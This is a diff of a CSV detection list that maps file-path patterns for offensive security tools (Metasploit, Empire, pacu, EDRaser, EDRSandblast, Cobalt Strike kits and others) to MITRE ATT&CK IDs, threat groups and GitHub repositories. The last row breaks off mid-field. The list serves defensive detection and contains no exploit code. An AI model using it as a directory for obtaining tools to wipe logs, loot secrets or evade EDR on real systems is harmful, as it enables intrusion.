-"*/e2e_commands.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*/e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*/e2e_commands.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Ebowla.git*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*/ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*/ec2__backdoor_ec2_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ec2__check_termination_protection*.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ec2__startup_shell_script/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/ec2_public_ips_*_*.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__backdoor_ec2_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__check_termination_protection*.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2__startup_shell_script/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ec2_public_ips_*_*.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/EC2Looter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/echoac-poc.git*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" -"*/edb-35948/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/edb-35948/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*/EDRaser.git*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*/edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" -"*/edr-checker/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/edr-checker/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/EDRSandblast.git*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*/EDRSandblast/*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/EDRSandblast/*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/EfsPotato.git*","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z" -"*/egghunter.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/egghunter.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*/ElevateKit/elevate.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*/elf/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/elf/exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*/ElevateKit/elevate.*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*/elf/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/elf/exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/ELFLoader/*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" -"*/Elite/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Elite/Elite*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/email_spoof_checks.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "*/EmailAll.git*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*/emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" @@ -3472,25 +3482,28 @@ "*/Empire.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/empire/client/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/empire:latest*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 